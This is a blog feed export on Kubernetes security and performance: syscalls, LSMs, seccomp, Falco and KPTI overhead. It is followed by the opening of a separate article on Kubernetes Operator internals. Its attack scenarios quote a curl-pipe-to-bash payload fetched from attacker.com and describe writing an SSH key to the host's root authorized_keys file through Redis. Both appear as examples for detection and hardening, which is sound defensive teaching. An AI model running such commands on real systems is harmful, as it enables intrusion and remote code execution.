&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbmvib311pzri714j6ezc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbmvib311pzri714j6ezc.png" alt="image" width="800" height="845"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Three LSMs are relevant in Kubernetes:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;LSM&lt;/th&gt;
&lt;th&gt;Mechanism&lt;/th&gt;
&lt;th&gt;Kubernetes Usage&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://apparmor.net/" rel="noopener noreferrer"&gt;AppArmor&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Path-based profiles — restrict file access, network, capabilities per process&lt;/td&gt;
&lt;td&gt;Default on Ubuntu/Debian nodes; containerd applies profiles per container&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://www.redhat.com/en/topics/linux/what-is-selinux" rel="noopener noreferrer"&gt;SELinux&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Label-based mandatory access control — every process and file has a security context&lt;/td&gt;
&lt;td&gt;Default on RHEL/CentOS nodes; OpenShift enforces SELinux across all pods&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;&lt;a href="https://landlock.io/" rel="noopener noreferrer"&gt;Landlock&lt;/a&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Unprivileged sandboxing — processes can voluntarily restrict their own file access&lt;/td&gt;
&lt;td&gt;Emerging; available since kernel 5.13; useful for defence-in-depth in application code&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Why this matters for &lt;a href="https://nvd.nist.gov/vuln/detail/cve-2022-0492" rel="noopener noreferrer"&gt;CVE-2022-0492&lt;/a&gt;:&lt;/strong&gt; That exploit required &lt;code&gt;unshare()&lt;/code&gt; and &lt;code&gt;mount()&lt;/code&gt; syscalls. seccomp's &lt;code&gt;RuntimeDefault&lt;/code&gt; profile blocked them. But if you'd been running without seccomp, AppArmor's default container profile would have independently denied the &lt;code&gt;mount&lt;/code&gt; operation. This is defence-in-depth working as intended — two independent layers, either of which alone would have stopped the exploit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Staff-level note:&lt;/strong&gt; AppArmor and SELinux profiles are often set to &lt;code&gt;Unconfined&lt;/code&gt; in practice because they're hard to operationalise at scale. This is the real risk — not that the tools don't work, but that they're disabled. A platform team should treat LSM profile coverage as a first-class metric alongside seccomp adoption.&lt;/p&gt;





&lt;h2&gt;
  
  
  Real-World Scenarios
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Scenario 1: The Cryptominer Escape
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What happened:&lt;/strong&gt; An attacker compromised a poorly-configured Redis instance in a container (no auth, exposed port). They:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Used Redis's &lt;code&gt;CONFIG SET dir&lt;/code&gt; and &lt;code&gt;CONFIG SET dbfilename&lt;/code&gt; to write an SSH public key to &lt;code&gt;/root/.ssh/authorized_keys&lt;/code&gt; on the host — possible because the container ran as root and the host &lt;code&gt;/root&lt;/code&gt; was mounted in.&lt;/li&gt;
&lt;li&gt;SSH'd into the host directly.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Syscall trace of the attack:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;openat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AT_FDCWD&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"/mnt/host-root/.ssh/authorized_keys"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;O_WRONLY&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="n"&gt;O_CREAT&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"ssh-rsa AAAA..."&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;...)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What would have caught it:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;seccomp:&lt;/strong&gt; A custom profile would not have blocked &lt;code&gt;openat&lt;/code&gt; (it's fundamental), but mounting host paths is a Kubernetes admission controller concern.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Falco rule:&lt;/strong&gt; &lt;code&gt;openat&lt;/code&gt; to a path outside the container's expected directories → alert.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Root cause fix:&lt;/strong&gt; Don't run containers as root. Use &lt;code&gt;runAsNonRoot: true&lt;/code&gt;. Don't mount host paths.&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  Scenario 2: The Lateral Movement via &lt;code&gt;execve&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What happened:&lt;/strong&gt; An attacker found an RCE in a Java app. The exploit triggered &lt;code&gt;Runtime.exec("curl http://attacker.com/stage2 | bash")&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Syscall sequence:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;clone()         → fork a child process
execve("bash")  → replace child with bash
execve("curl")  → curl downloads payload
execve("bash")  → execute payload
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What Falco catches immediately:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A Java process (&lt;code&gt;java&lt;/code&gt;) spawning &lt;code&gt;bash&lt;/code&gt; → anomalous parent-child relationship&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;curl&lt;/code&gt; executing from within a container that has no business running &lt;code&gt;curl&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;execve&lt;/code&gt; of any shell from a workload that is not expected to spawn one&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;What seccomp can do:&lt;/strong&gt; If your Java service has a custom seccomp profile that doesn't include &lt;code&gt;execve&lt;/code&gt; at all (many services never need to fork/exec), the &lt;code&gt;clone()&lt;/code&gt; + &lt;code&gt;execve()&lt;/code&gt; chain is blocked before it starts.&lt;/p&gt;




&lt;h3&gt;
  
  
  Scenario 3: eBPF-Based Zero-Trust Networking
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Setup:&lt;/strong&gt; You're migrating from an iptables-based CNI to Cilium. The goal is L7-aware network policy.&lt;/p&gt;

&lt;p&gt;Without eBPF, enforcing "Pod A can call &lt;code&gt;/api/users&lt;/code&gt; on Pod B but not &lt;code&gt;/api/admin&lt;/code&gt;" requires an L7 proxy sidecar (Istio/Envoy). Every request goes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;App → Envoy sidecar (user space) → Kernel → Network → Kernel → Envoy sidecar → App
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's four kernel crossings per request.&lt;/p&gt;

&lt;p&gt;With Cilium's eBPF-based L7 policy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;App → Kernel (eBPF L7 hook) → Network → Kernel (eBPF L7 hook) → App
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two kernel crossings for L3/L4 policy. For L7 (HTTP method/path inspection), Cilium uses a per-node Envoy proxy — not a per-pod sidecar — which is redirected to via eBPF socket hooks. This eliminates the per-pod sidecar overhead while still enabling L7 enforcement. The key distinction: L3/L4 enforcement is entirely in eBPF (zero user-space hops); L7 enforcement redirects through a &lt;em&gt;shared&lt;/em&gt; node-level proxy rather than duplicating a proxy instance per pod.&lt;/p&gt;

&lt;p&gt;The syscall angle: eBPF programs attach to &lt;code&gt;sock_ops&lt;/code&gt; and &lt;code&gt;sk_msg&lt;/code&gt; hooks — fired at socket-level syscall boundaries. Before a TCP connection is fully established or a stream is forwarded, the eBPF program has already made the L3/L4 allow/deny decision, with L7 decisions delegated to the node Envoy.&lt;/p&gt;





&lt;h2&gt;
  
  
  Performance Implications
&lt;/h2&gt;

&lt;p&gt;Every syscall has a cost. The mode switch from Ring 3 (user mode) to Ring 0 (kernel mode) takes 100–300 nanoseconds on modern hardware — negligible per call, but significant at scale. Two factors in Kubernetes amplify this cost beyond the baseline.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The two biggest syscall performance concerns in Kubernetes:&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Meltdown / KPTI Mitigations
&lt;/h3&gt;

&lt;p&gt;In January 2018, researchers disclosed &lt;strong&gt;&lt;a href="https://www.redhat.com/en/blog/what-are-meltdown-and-spectre-heres-what-you-need-know" rel="noopener noreferrer"&gt;Meltdown&lt;/a&gt;&lt;/strong&gt; (&lt;a href="https://nvd.nist.gov/vuln/detail/cve-2017-5754" rel="noopener noreferrer"&gt;CVE-2017-5754&lt;/a&gt;), a CPU vulnerability that allowed user-space code to read arbitrary kernel memory by exploiting speculative execution — a CPU optimization where the processor runs instructions ahead of time before determining if they should actually execute. An attacker could use this to read secrets (keys, passwords, tokens) that the kernel had in memory from other processes, all without elevated privileges.&lt;/p&gt;

&lt;p&gt;The fix was &lt;strong&gt;&lt;a href="https://en.wikipedia.org/wiki/Kernel_page-table_isolation" rel="noopener noreferrer"&gt;KPTI&lt;/a&gt; (Kernel Page Table Isolation)&lt;/strong&gt;, shipped in Linux 4.15+ and backported to LTS kernels. The idea: keep two completely separate page tables — one for user space (which has no mappings to kernel memory), and one for kernel space (which has full mappings). Before KPTI, both user and kernel code shared a single page table with kernel memory mapped but protected. With KPTI, kernel memory is invisible to user space entirely; there's nothing to speculatively leak.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Note: KPTI does &lt;em&gt;not&lt;/em&gt; address &lt;strong&gt;Spectre&lt;/strong&gt; (&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5753" rel="noopener noreferrer"&gt;CVE-2017-5753&lt;/a&gt;, &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5715" rel="noopener noreferrer"&gt;CVE-2017-5715&lt;/a&gt;), a related but distinct speculative execution vulnerability. Spectre mitigations — &lt;a href="https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/retpoline-branch-target-injection-mitigation.html" rel="noopener noreferrer"&gt;Retpoline&lt;/a&gt; (a compiler technique to prevent speculative indirect branch prediction), &lt;a href="https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html" rel="noopener noreferrer"&gt;IBRS&lt;/a&gt; (microcode that restricts cross-privilege speculative execution), and &lt;a href="https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-predictor-barrier.html" rel="noopener noreferrer"&gt;IBPB&lt;/a&gt; (a barrier that flushes branch predictor state between privilege contexts) — are separate and independently expensive.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;How KPTI makes syscalls more expensive:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;On every user↔kernel transition, the CPU must switch between the two separate page table sets. This is done via the &lt;strong&gt;&lt;a href="https://wiki.osdev.org/Paging" rel="noopener noreferrer"&gt;CR3 register&lt;/a&gt;&lt;/strong&gt; — the control register that points to the currently active page table. A CR3 write forces the CPU to start using a different page table, which inherently invalidates the &lt;strong&gt;&lt;a href="https://en.wikipedia.org/wiki/Translation_lookaside_buffer" rel="noopener noreferrer"&gt;TLB (Translation Lookaside Buffer)&lt;/a&gt;&lt;/strong&gt; — the CPU's cache of recent virtual-to-physical address translations. A cold TLB means the next memory accesses require expensive page table walks instead of cache hits.&lt;/p&gt;

&lt;p&gt;Modern Intel/AMD CPUs support &lt;strong&gt;&lt;a href="https://en.wikipedia.org/wiki/Translation_lookaside_buffer#PCID" rel="noopener noreferrer"&gt;PCID (Process Context Identifiers)&lt;/a&gt;&lt;/strong&gt;, a hardware feature that tags TLB entries with a context ID so the CPU can maintain TLB entries for multiple address spaces simultaneously. With PCID, a CR3 switch doesn't require flushing the entire TLB — the CPU simply activates a different set of tagged entries. This significantly reduces KPTI's overhead, but the CR3 switch itself still has a cost.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real-world overhead on PCID-enabled modern CPUs:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Workload type&lt;/th&gt;
&lt;th&gt;KPTI overhead&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Typical Kubernetes API server / web services&lt;/td&gt;
&lt;td&gt;2–10%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Syscall-heavy services (high-RPS Redis, dense I/O pipelines)&lt;/td&gt;
&lt;td&gt;20–30%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pathological microbenchmarks (&amp;gt;1M syscalls/sec/CPU)&lt;/td&gt;
&lt;td&gt;Up to 800%*&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;em&gt;*Brendan Gregg, Netflix — a lab scenario, not a production baseline. For most Kubernetes workloads, 5–10% is a realistic planning budget.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faacn36i4io7965v59dvj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faacn36i4io7965v59dvj.png" alt="image" width="800" height="93"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is the architectural reason &lt;code&gt;io_uring&lt;/code&gt; was designed the way it was (see The &lt;code&gt;io_uring&lt;/code&gt; Problem): by sharing ring buffers between user space and kernel space, applications can submit and complete many I/O operations without a syscall per operation, amortizing KPTI overhead across batches.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Syscall Frequency vs. Batching
&lt;/h3&gt;

&lt;p&gt;Beyond KPTI, the raw number of syscalls a service issues matters independently. The Ring 3→Ring 0→Ring 3 round-trip is not just a page-table cost — it also involves register saves/restores, privilege checks, and kernel stack setup. These are fixed costs per syscall, regardless of how much work is done inside.&lt;/p&gt;

&lt;p&gt;A service making 100,000 small &lt;code&gt;write()&lt;/code&gt; calls is slower than one making 10,000 &lt;code&gt;write()&lt;/code&gt; calls with 10x larger buffers, even if total bytes are identical. This is why Go's &lt;code&gt;bufio.Writer&lt;/code&gt;, Java's &lt;code&gt;BufferedWriter&lt;/code&gt;, and virtually all I/O abstractions exist — they buffer writes in user space and flush in larger chunks, reducing syscall frequency. The actual data movement is the same; the kernel crossing overhead is not.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Kubernetes-specific manifestation:&lt;/strong&gt; services with high syscall frequency per RPS are more sensitive to &lt;strong&gt;noisy neighbors&lt;/strong&gt; — other workloads on the same node that drive up syscall contention. A cryptominer running &lt;code&gt;mmap&lt;/code&gt; in a tight loop on the same physical node will degrade your API latency through two mechanisms:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Syscall contention&lt;/strong&gt; — the kernel serializes certain operations; many concurrent syscalls from different containers compete for kernel-internal locks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cache pollution&lt;/strong&gt; — frequent KPTI-driven CR3 switches and the kernel code paths they invoke thrash the CPU's L1/L2 instruction and data caches, degrading cache hit rates for your workload's subsequent kernel entries.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This happens even if cgroups are correctly configured for CPU and memory — cgroups do not limit syscall rate or kernel cache footprint.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://falco.org/" rel="noopener noreferrer"&gt;Falco&lt;/a&gt; and eBPF-based profiling tools like &lt;a href="https://www.parca.dev/" rel="noopener noreferrer"&gt;Parca&lt;/a&gt; can surface these patterns before they become incidents. Parca attaches to &lt;code&gt;perf_event&lt;/code&gt; hooks to capture continuous CPU flame graphs — if you see kernel time unexpectedly high in your service's profile during a noisy-neighbor incident, syscall pressure is the first thing to investigate.&lt;/p&gt;





&lt;h2&gt;
  
  
  What a Staff Engineer Should Own
&lt;/h2&gt;

&lt;p&gt;Understanding syscalls isn't just trivia — it maps directly to ownership responsibilities at the platform level.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdotl7h6tc5kpdxujy9lq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdotl7h6tc5kpdxujy9lq.png" alt="image" width="800" height="332"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Concrete deliverables a staff engineer should drive:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Syscall baseline per workload class&lt;/strong&gt; — profile what syscalls each service tier actually uses in staging. Use this to inform both seccomp profiles and anomaly detection thresholds.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;seccomp profile graduation pipeline&lt;/strong&gt; — automate the path from &lt;code&gt;RuntimeDefault&lt;/code&gt; → custom profile. Record in staging, diff against baseline, promote on green CI.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Falco rule library with suppression logic&lt;/strong&gt; — raw Falco rules generate alert fatigue. Build suppression for known-safe patterns (init containers, health checks, log rotation) and escalation logic for true positives.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Kernel upgrade policy&lt;/strong&gt; — every kernel version changes the syscall landscape (new &lt;code&gt;io_uring&lt;/code&gt; operations, new &lt;code&gt;bpf&lt;/code&gt; commands). Define a test matrix that validates your seccomp profiles and Falco rules against each kernel version before rollout.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Threat model documentation&lt;/strong&gt; — explicitly document your isolation assumptions. If you're running &lt;code&gt;RuntimeDefault&lt;/code&gt; seccomp on a multi-tenant cluster, you need to acknowledge the residual risk from the ~450 exposed syscalls and justify it against the cost of gVisor or stricter profiles.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Syscall drift detection&lt;/strong&gt; — new application versions routinely introduce new syscalls, especially as third-party dependencies update. A tightened seccomp profile that worked in v1.4.0 can silently break workloads in v1.5.0 when a new library starts calling &lt;code&gt;io_uring_setup&lt;/code&gt; or &lt;code&gt;getrandom&lt;/code&gt;. A production platform should automatically detect syscall drift during canary deployments — compare the observed syscall set against the approved profile baseline and surface divergences before the canary promotes to production. Tools like &lt;code&gt;inspektor-gadget&lt;/code&gt; and Falco's audit mode can instrument this automatically.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
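&lt;p&gt;The drift check in item 6 reduces to a set difference, assuming the approved and observed syscall lists have already been collected (for example, from a seccomp profile and an &lt;code&gt;inspektor-gadget&lt;/code&gt; trace of the canary). The names and sample data below are illustrative only.&lt;/p&gt;

```go
// Minimal sketch of syscall drift detection for a canary gate: report any
// syscall observed in the canary that is absent from the approved baseline.
package main

import (
	"fmt"
	"sort"
)

func syscallDrift(baseline, observed []string) []string {
	approved := make(map[string]bool, len(baseline))
	for _, s := range baseline {
		approved[s] = true
	}
	var drift []string
	for _, s := range observed {
		if !approved[s] {
			drift = append(drift, s)
		}
	}
	sort.Strings(drift) // stable output for diffing in CI
	return drift
}

func main() {
	baseline := []string{"read", "write", "epoll_wait", "futex"}
	observed := []string{"read", "write", "epoll_wait", "futex",
		"io_uring_setup", "getrandom"} // new library dependency at work
	if d := syscallDrift(baseline, observed); len(d) > 0 {
		fmt.Println("drift detected, block canary promotion:", d)
	}
}
```

&lt;p&gt;In a real pipeline this comparison runs automatically during the canary window, and a non-empty diff fails the promotion gate with the offending syscalls attached for review.&lt;/p&gt;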





&lt;h2&gt;
  
  
  Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;The Linux man-pages project&lt;/strong&gt; — &lt;code&gt;man 2 syscall&lt;/code&gt; and individual syscall man pages are the authoritative reference&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;"Linux Kernel Development" — Robert Love&lt;/strong&gt; — best single-volume reference for kernel internals&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Brendan Gregg's BPF Performance Tools&lt;/strong&gt; — the canonical reference for eBPF-based observability&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://gvisor.dev/docs/" rel="noopener noreferrer"&gt;gVisor design docs&lt;/a&gt;&lt;/strong&gt; — deep dive on the Sentry and Gofer architecture&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Falco documentation&lt;/strong&gt; — rule writing, driver selection, deployment patterns&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;a href="https://nvd.nist.gov/vuln/detail/cve-2019-5736" rel="noopener noreferrer"&gt;CVE-2019-5736&lt;/a&gt;, &lt;a href="https://nvd.nist.gov/vuln/detail/cve-2022-0492" rel="noopener noreferrer"&gt;CVE-2022-0492&lt;/a&gt;&lt;/strong&gt; — read the original PoC write-ups, not just the summaries. Tracing the syscall sequence of a real exploit is the fastest way to internalize why this layer matters.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cilium's eBPF documentation&lt;/strong&gt; — &lt;a href="https://docs.cilium.io" rel="noopener noreferrer"&gt;docs.cilium.io&lt;/a&gt; — best practical reference for eBPF in a Kubernetes context&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;io_uring&lt;/code&gt; and security&lt;/strong&gt; — Lord et al., "An Analysis of the &lt;code&gt;io_uring&lt;/code&gt; Attack Surface" (2022); Jann Horn's CVE write-ups at chromium.googlesource.com; gVisor's rationale for disabling it by default&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;If you're running Kubernetes in production and the words "seccomp profile" don't appear in your threat model, that's the gap to close first. Everything else in this post is the foundation for understanding why.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>sre</category>
      <category>infrastructure</category>
      <category>linux</category>
      <category>kubernetes</category>
    </item>
    <item>
      <title>Kubernetes Operators: A Deep Dive into the Internals</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Wed, 25 Feb 2026 18:55:44 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/kubernetes-operators-a-deep-dive-into-the-internals-221m</link>
      <guid>https://dev.to/piyushjajoo/kubernetes-operators-a-deep-dive-into-the-internals-221m</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Written from the perspective of a senior engineer who has built, debugged, and battle-tested operators in production.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Why Operators Exist&lt;/li&gt;
&lt;li&gt;The Conceptual Foundation: Control Theory&lt;/li&gt;
&lt;li&gt;Kubernetes API Machinery: The Backbone&lt;/li&gt;
&lt;li&gt;Custom Resource Definitions (CRDs)&lt;/li&gt;
&lt;li&gt;The Controller Runtime: Inside the Engine&lt;/li&gt;
&lt;li&gt;Informers, Listers, and the Cache&lt;/li&gt;
&lt;li&gt;The Reconciliation Loop in Depth&lt;/li&gt;
&lt;li&gt;Work Queues and Rate Limiting&lt;/li&gt;
&lt;li&gt;Watches, Events, and Predicates&lt;/li&gt;
&lt;li&gt;Ownership, Finalizers, and Garbage Collection&lt;/li&gt;
&lt;li&gt;Status Subresource and Conditions&lt;/li&gt;
&lt;li&gt;Generation vs ObservedGeneration: A Deep Dive&lt;/li&gt;
&lt;li&gt;Concurrency, MaxConcurrentReconciles, and Cache Scoping&lt;/li&gt;
&lt;li&gt;Leader Election&lt;/li&gt;
&lt;li&gt;Webhooks: Admission and Conversion&lt;/li&gt;
&lt;li&gt;Operator Patterns and Anti-Patterns&lt;/li&gt;
&lt;li&gt;Observability and Debugging&lt;/li&gt;
&lt;li&gt;Production Considerations&lt;/li&gt;
&lt;li&gt;Ready to Build Your Own Operator&lt;/li&gt;
&lt;/ol&gt;





&lt;h2&gt;
  
  
  Why Operators Exist
&lt;/h2&gt;

&lt;p&gt;Before we dive into internals, let's get philosophical for a moment. Kubernetes gives you primitives: Pods, Deployments, Services, ConfigMaps. These are general-purpose building blocks. They're powerful, but they're &lt;em&gt;dumb&lt;/em&gt; — they don't understand your application's operational semantics.&lt;/p&gt;

&lt;p&gt;Consider a PostgreSQL cluster. A skilled DBA knows:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;How to perform a rolling upgrade without downtime&lt;/li&gt;
&lt;li&gt;When and how to promote a standby to primary during a failure&lt;/li&gt;
&lt;li&gt;How to orchestrate backups in a consistent way&lt;/li&gt;
&lt;li&gt;How to resize volumes without data loss&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;None of this knowledge lives in native Kubernetes. An &lt;strong&gt;Operator&lt;/strong&gt; is the mechanism to &lt;em&gt;codify operational expertise&lt;/em&gt; into software that runs inside your cluster and manages resources on your behalf.&lt;/p&gt;

&lt;p&gt;The formal definition: An Operator is a &lt;strong&gt;custom controller&lt;/strong&gt; that manages &lt;strong&gt;Custom Resources&lt;/strong&gt; to automate complex, stateful application lifecycle management.&lt;/p&gt;





&lt;h2&gt;
  
  
  The Conceptual Foundation: Control Theory
&lt;/h2&gt;

&lt;p&gt;Every operator is, at its core, an implementation of a &lt;strong&gt;closed-loop control system&lt;/strong&gt; — specifically what control engineers call a &lt;em&gt;feedback control loop&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu082l9aa1czm4qpc0egv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu082l9aa1czm4qpc0egv.png" alt="image" width="800" height="138"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The three core concepts are:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Desired State&lt;/strong&gt; — What you declare in your Custom Resource (the &lt;code&gt;spec&lt;/code&gt; field). This is immutable intent.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Observed State&lt;/strong&gt; — What's actually running in the cluster right now (the &lt;code&gt;status&lt;/code&gt; field plus the state of managed child resources).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Reconciliation&lt;/strong&gt; — The act of computing the delta between desired and observed state, then taking actions to close that gap.&lt;/p&gt;

